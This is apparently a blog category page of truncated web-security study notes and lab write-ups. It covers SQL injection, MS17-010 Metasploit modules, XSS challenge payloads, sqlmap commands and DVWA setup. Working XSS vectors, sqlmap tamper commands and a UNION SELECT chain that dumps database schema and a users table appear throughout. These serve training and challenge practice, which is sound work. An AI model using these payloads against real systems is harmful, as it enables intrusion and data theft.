Category: Information Security

  • Notes on Web Security Course: analysis and utilization of SQL vulnerability


    3-1 SQL language foundation. 3-2 ACCESS manual injection. What does `and 1=1` mean: enter the database to query information and determine whether there is an injection point. `Exists (select * from admin)`: query statement. 3-6 MySQL manual injection. In a logical expression, `and` takes precedence over `or`. Sqlmap installation and setup. If uppercase is the […]

  • MS17 in MSF


    1. auxiliary/scanner/smb/smb_ms17_010 // auxiliary module that scans for and detects the vulnerability. The scan results show that the vulnerability exists on hosts 2, 3 and 4! 2. auxiliary/admin/smb/ms17_010_command // scan the online hosts with port 445 open; MS17-010 exploits the SMB service on port 445 […]

  • 7 common XSS


    1. URL Reflection. We can add our own XSS vector/payload when the URL is reflected in the source code in some way. For PHP pages, you can use the slash character (/) to add anything after the page name. A leading `">` is required to break out of the current tag in order […]

  • Multi Reflection (Pro Only)


    Case 14 – Double Injection in HTML Context with Double Quotes. Case 15 – Double Injection in Mixed Context (HTML + JS) with Default Quotes. Case 16 – Quoteless Inline Double Injection in JS variables: `;alert(1)//\`. Case 17 – Quoteless Inline Double Injection in JS object: `};alert(1)//\`. Case […]

  • DOM-based XSS Test Cases


    Case 23 – DOM Injection via URL parameter (by server + client). Case 24 – DOM Injection via URL Parameter (Document Sink). Case 25 – DOM Injection via Open Redirection (Location Sink). Case 26 – DOM Injection via URL Parameter (E Sink): `'NASDAQ''NASDAQ';alert(1);`. Reference resources: […]

  • RFI to RCE challenge

    Time: 2020-3-23. Construct payload:

  • XSS Challenges


    Summary: Stage #1 payload: `alert(document.domain);`. Stage #2: tried `alert(document.domain);`, unsuccessful because the input is not closed; payload: `">`. Stage #3 Note: because all of them are POST requests, the P1 variable has no XSS and the P2 variable has problems, so packet capturing is needed: `;javascript:alert(document.domain);//` and `p2=alert(document.domain);`. Stage #4: P3 is a hidden […]

  • Challenges-XSS

    Time: 2020-3-21. warmup, adobe, JSON

  • Google XSS Challenge

    Time: 2020-3-20. payload: filtered-out keywords

  • Vulnerability test of manual injection after SQL filtering characters (question 1)

    Time: 2020-3-18. Analysis: this challenge is a time-based blind injection; in such a case sqlmap is usually used to inject directly, because the manual syntax is too complex!!! `sqlmap -u "" --tamper charencode,equaltolike,space2comment --current-db`; `sqlmap -u "" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup --tables`; `sqlmap -u "" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member --columns`; `sqlmap -u […]`

  • SQL injection penetration practice


    Summary: Determine the injection point: `and 1=1` #true, `and 1=2` #false. Guess the number of columns in the table: `+ORDER+BY+06` #true, `+ORDER+BY+07` #false. Enumerate fields: `+UNION+ALL+SELECT+1,2,3,4,5,6`. Enumerate database information: `+UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6`. Guess tables: `+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6`. Guess the fields of the table: `+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f7573657273),3,4,5,6`. Get field […]

  • Win10 DVWA download installation configuration (novice learning penetration)


    My computer has been reinstalled, so I need to reinstall DVWA, the learning environment for penetration testing. I'll take this opportunity to describe the DVWA installation process. Because computer configurations and environments differ, I installed DVWA on my machine in one go by following my own installation tutorial. If you encounter […]